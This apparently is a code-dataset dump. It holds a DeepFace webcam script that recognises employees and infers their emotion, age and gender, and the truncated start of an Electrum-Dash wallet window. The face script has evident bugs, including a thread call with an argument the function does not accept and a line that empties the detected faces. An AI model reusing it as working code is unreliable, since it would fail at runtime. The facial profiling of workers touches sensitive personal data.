source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
realtime.py
|
import os
from tqdm import tqdm
import numpy as np
import pandas as pd
import cv2
import time
import re
import threading
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
from deepface import DeepFace
from deepface.extendedmodels import Age
from deepface.commons import functions, realtime, distance as dst
from deepface.detectors import FaceDetector
employee_lock = threading.Lock()
employee_name_recon = None
is_in_discussion = False
unknown_employee_name = "UNKNOWN"
def analyze_image(image, input_shape, data_frame, detected_faces_final, enable_face_analysis, face_model, face_model_threshold, emotion_model, age_model, gender_model, callback):
global employee_name_recon
global unknown_employee_name
global is_in_discussion
for detected_face in detected_faces_final:
x = detected_face[0]
y = detected_face[1]
w = detected_face[2]
h = detected_face[3]
# -------------------------------
# apply deep learning for custom_face
custom_face = image[y:y + h, x:x + w]
# -------------------------------
# facial attribute analysis
emotion_label = ""
if enable_face_analysis:
gray_img = functions.preprocess_face(img=custom_face, target_size=(48, 48), grayscale=True,
enforce_detection=False, detector_backend='opencv')
emotion_labels = ['Angry', 'Disgust', 'Fear', 'Happy', 'Sad', 'Surprise', 'Neutral']
emotion_predictions = emotion_model.predict(gray_img)[0, :]
sum_of_predictions = emotion_predictions.sum()
mood_items = []
for i in range(0, len(emotion_labels)):
mood_item = []
emotion_label = emotion_labels[i]
emotion_prediction = 100 * emotion_predictions[i] / sum_of_predictions
mood_item.append(emotion_label)
mood_item.append(emotion_prediction)
mood_items.append(mood_item)
emotion_df = pd.DataFrame(mood_items, columns=["emotion", "score"])
emotion_df = emotion_df.sort_values(by=["score"], ascending=False).reset_index(drop=True)
# background of mood box
highest_emotion_score = 0.0
for index, instance in emotion_df.iterrows():
emotion_score = instance['score'] / 100
if emotion_score > highest_emotion_score:
emotion_label = "%s " % (instance['emotion'])
highest_emotion_score = emotion_score
# -------------------------------
face_224 = functions.preprocess_face(img=custom_face, target_size=(224, 224),
grayscale=False, enforce_detection=False,
detector_backend='opencv')
age_predictions = age_model.predict(face_224)[0, :]
apparent_age = Age.findApparentAge(age_predictions)
# -------------------------------
gender_prediction = gender_model.predict(face_224)[0, :]
if np.argmax(gender_prediction) == 0:
gender = "W"
elif np.argmax(gender_prediction) == 1:
gender = "M"
# print(str(int(apparent_age))," years old ", dominant_emotion, " ", gender)
analysis_report = str(int(apparent_age)) + " " + gender
print(f"employee analysis: emotion: {emotion_label} ({highest_emotion_score}), {analysis_report}")
# -------------------------------
# face recognition
custom_face = functions.preprocess_face(img=custom_face,
target_size=(input_shape[1], input_shape[0]),
enforce_detection=False, detector_backend='opencv')
# check preprocess_face function handled
if custom_face.shape[1:3] == input_shape:
if data_frame.shape[0] > 0: # if there are images to verify, apply face recognition
img1_representation = face_model.predict(custom_face)[0, :]
# print(freezed_frame," - ",img1_representation[0:5])
def findDistance(row):
distance_metric = row['distance_metric']
img2_representation = row['embedding']
distance = 1000 # initialize very large value
if distance_metric == 'cosine':
distance = dst.findCosineDistance(img1_representation, img2_representation)
elif distance_metric == 'euclidean':
distance = dst.findEuclideanDistance(img1_representation, img2_representation)
elif distance_metric == 'euclidean_l2':
distance = dst.findEuclideanDistance(dst.l2_normalize(img1_representation),
dst.l2_normalize(img2_representation))
return distance
data_frame['distance'] = data_frame.apply(findDistance, axis=1)
data_frame = data_frame.sort_values(by=["distance"])
candidate = data_frame.iloc[0]
employee_name = candidate['employee']
best_distance = candidate['distance']
# print(candidate[['employee', 'distance']].values)
# if True:
if best_distance <= face_model_threshold:
# print(employee_name)
# display_img = cv2.imread(employee_name)
path = os.path.normpath(employee_name)
label = path.split(os.sep)[-2]
employee_lock.acquire()
employee_name_recon = label
employee_lock.release()
print(f"employee recognized: {label}")
# publish something here
callback(True, label, emotion_label)
else:
employee_lock.acquire()
employee_name_recon = unknown_employee_name
employee_lock.release()
callback(False, "unknown", emotion_label)
print("all done!!!")
employee_lock.acquire()
is_in_discussion = False
employee_lock.release()
def generate_image_with_avatar(avatar, image):
display_img = np.full(image.shape, 255, np.uint8)
avatar_x_pos = [0, avatar.shape[1]]
avatar_y_offset = int((display_img.shape[0] - avatar.shape[0]) / 2)
avatar_y_pos = [avatar_y_offset, avatar_y_offset + avatar.shape[0]]
display_img[avatar_y_pos[0]:avatar_y_pos[1], avatar_x_pos[0]:avatar_x_pos[1]] = avatar
diff_x = display_img.shape[1] - avatar.shape[1]
img_x_pos = [avatar.shape[1], display_img.shape[1]]
img_y_pos = [0, display_img.shape[0]]
img_x_offset = int(avatar.shape[1] / 2)
display_img[img_y_pos[0]:img_y_pos[1], img_x_pos[0]:img_x_pos[1]] =\
image[0:image.shape[0], img_x_offset:img_x_offset + diff_x]
return display_img
def analysis(db_path, avatar_path, model_name='VGG-Face', detector_backend='opencv', distance_metric='cosine',
enable_face_analysis=True, source=0, time_threshold=5, frame_threshold=5, callback=None):
# ------------------------
face_detector = FaceDetector.build_model(detector_backend)
print("Detector backend is ", detector_backend)
# ------------------------
input_shape = (224, 224)
input_shape_x = input_shape[0]
input_shape_y = input_shape[1]
text_color = (255, 255, 255)
employees = []
# check passed db folder exists
if os.path.isdir(db_path) == True:
for r, d, f in os.walk(db_path): # r=root, d=directories, f = files
for file in f:
if ('.jpg' in file):
# exact_path = os.path.join(r, file)
exact_path = r + "/" + file
# print(exact_path)
employees.append(exact_path)
if len(employees) == 0:
print("WARNING: There is no image in this path ( ", db_path, ") . Face recognition will not be performed.")
# ------------------------
if len(employees) > 0:
model = DeepFace.build_model(model_name)
print(model_name, " is built")
# ------------------------
input_shape = functions.find_input_shape(model)
input_shape_x = input_shape[0];
input_shape_y = input_shape[1]
# tuned thresholds for model and metric pair
threshold = dst.findThreshold(model_name, distance_metric)
# ------------------------
# facial attribute analysis models
if enable_face_analysis == True:
tic = time.time()
emotion_model = DeepFace.build_model('Emotion')
print("Emotion model loaded")
age_model = DeepFace.build_model('Age')
print("Age model loaded")
gender_model = DeepFace.build_model('Gender')
print("Gender model loaded")
toc = time.time()
print("Facial attibute analysis models loaded in ", toc - tic, " seconds")
# ------------------------
# find embeddings for employee list
tic = time.time()
# -----------------------
pbar = tqdm(range(0, len(employees)), desc='Finding embeddings')
# TODO: why don't you store those embeddings in a pickle file similar to find function?
cv2.imread("")
embeddings = []
# for employee in employees:
for index in pbar:
employee = employees[index]
pbar.set_description("Finding embedding for %s" % (employee.split("/")[-1]))
embedding = []
# preprocess_face returns single face. this is expected for source images in db.
img = functions.preprocess_face(img=employee, target_size=(input_shape_y, input_shape_x),
enforce_detection=False, detector_backend=detector_backend)
img_representation = model.predict(img)[0, :]
embedding.append(employee)
embedding.append(img_representation)
embeddings.append(embedding)
df = pd.DataFrame(embeddings, columns=['employee', 'embedding'])
df['distance_metric'] = distance_metric
toc = time.time()
print("Embeddings found for given data set in ", toc - tic, " seconds")
# -----------------------
pivot_img_size = 112 # face recognition result image
# load avatars
avatars = {}
for file in os.listdir(avatar_path):
full_path = os.path.join(avatar_path, file)
if os.path.isfile(full_path):
avatars[os.path.splitext(file)[0]] = cv2.imread(full_path)
# -----------------------
freeze = False
face_detected = False
face_included_frames = 0 # freeze screen if face detected sequantially 5 frames
freezed_frame = 0
tic = time.time()
cap = cv2.VideoCapture(source) # webcam
while (True):
ret, img = cap.read()
if img is None:
break
# cv2.namedWindow('img', cv2.WINDOW_FREERATIO)
# cv2.setWindowProperty('img', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
raw_img = img.copy()
resolution = img.shape;
resolution_x = img.shape[1];
resolution_y = img.shape[0]
top_offset = 50
ellipse_y = int((resolution_y - top_offset) * 0.45)
ellipse_x = int(ellipse_y * 0.85)
ellipse_center = (int(resolution_x / 2), int((resolution_y + top_offset) / 2))
if not freeze:
# faces = face_cascade.detectMultiScale(img, 1.3, 5)
# faces stores list of detected_face and region pair
faces = FaceDetector.detect_faces(face_detector, detector_backend, img, align=False)
if len(faces) == 0:
face_included_frames = 0
else:
faces = []
detected_faces = []
face_index = 0
center_offset = 40
for face, (x, y, w, h) in faces:
if ellipse_x * 1.5 < w < ellipse_x * 2 and \
ellipse_center[0] - center_offset < x + w / 2 < ellipse_center[0] + center_offset and \
ellipse_center[1] - center_offset < y + h / 2 < ellipse_center[
1] + center_offset: # discard small detected faces
face_detected = True
if face_index == 0:
face_included_frames = face_included_frames + 1 # increase frame for a single face
#cv2.rectangle(img, (x, y), (x + w, y + h), (67, 67, 67), 1) # draw rectangle to main image
#cv2.putText(img, str(frame_threshold - face_included_frames), (int(x + w / 4), int(y + h / 1.5)),
# cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 2)
detected_face = img[int(y):int(y + h), int(x):int(x + w)] # crop detected face
# -------------------------------------
detected_faces.append((x, y, w, h))
face_index = face_index + 1
# -------------------------------------
global is_in_discussion
if face_detected and face_included_frames >= frame_threshold and not is_in_discussion:
employee_lock.acquire()
is_in_discussion = True
employee_lock.release()
base_img = raw_img.copy()
detected_faces_final = detected_faces.copy()
print("starting thread")
t = threading.Thread(target=analyze_image, args=(base_img, input_shape, df, detected_faces_final, enable_face_analysis, model, threshold, emotion_model, age_model, gender_model, callback, avatars))
t.start()
if not is_in_discussion and not faces:
# cv2.putText(img, "Place your face inside the circle", (150, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.50,
# (50, 50, 50), 2)
display_img = generate_image_with_avatar(avatars["up"], img)
elif not is_in_discussion and faces:
cv2.ellipse(img=img, center=ellipse_center,
axes=(ellipse_x, ellipse_y), angle=0, startAngle=0, endAngle=360,
color=(128, 128, 128), thickness=2)
display_img = generate_image_with_avatar(avatars["down"], img)
else:
display_img = generate_image_with_avatar(avatars["welcome"], img)
cv2.imshow('img', display_img)
if cv2.waitKey(1) & 0xFF == ord('q'): # press q to quit
break
# kill open cv things
cap.release()
cv2.destroyAllWindows()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar, QAction)
import electrum_dash
from electrum_dash import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_dash.dash_tx import DashTxError
from electrum_dash.plugin import run_hook
from electrum_dash.i18n import _
from electrum_dash.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_dash.transaction import Transaction, TxOutput
from electrum_dash.address_synchronizer import AddTransactionException
from electrum_dash.wallet import (Multisig_Wallet, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_dash.version import ELECTRUM_VERSION
from electrum_dash.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_dash.exchange_rate import FxThread
from electrum_dash.simple_config import SimpleConfig
from electrum_dash.logging import Logger
from electrum_dash.paymentrequest import PR_PAID
from electrum_dash.base_crash_reporter import BaseCrashReporter
from electrum_dash.masternode_manager import MasternodeManager
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .masternode_dialog import MasternodeDialog
from .dash_qt import ExtraPayloadWidget
from .protx_qt import create_dip3_tab
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(31)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.setObjectName("main_window_container")
self.masternode_manager = None
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self._old_excepthook = None
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 8))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.dip3_tab = create_dip3_tab(self, wallet)
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
# Disabled until API is stable.
# tabs.addTab(self.create_proposals_tab(), _('Budget Proposals'))
tabs.setMinimumSize(1020, 500)
tabs.setObjectName("main_window_nav_bar")
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-dash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog)
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
# self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# 'proposals']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
if getattr(self.wallet.storage, 'backup_message', None):
self.show_warning(self.wallet.storage.backup_message,
title=_('Information'))
if self.network.tor_auto_on and not self.network.tor_on:
self.show_warning(self.network.tor_warn_msg +
self.network.tor_docs_uri_qt, rich_text=True)
self.tabs.currentChanged.connect(self.on_tabs_current_changed)
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Dash Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Dash Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Dash Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Dash Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
@pyqtSlot()
def on_tabs_current_changed(self):
cur_widget = self.tabs.currentWidget()
if cur_widget == self.dip3_tab and not cur_widget.have_been_shown:
cur_widget.on_first_showing()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'proposals', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
elif event == 'proposals':
self.proposals_changed()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.masternode_manager = MasternodeManager(self.wallet, self.config)
self.dip3_tab.w_model.reload_data()
self.dip3_tab.update_wallet_label()
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Dash Electrum Testnet" if constants.net.TESTNET else "Dash Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Dash coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Dash network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Dash Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
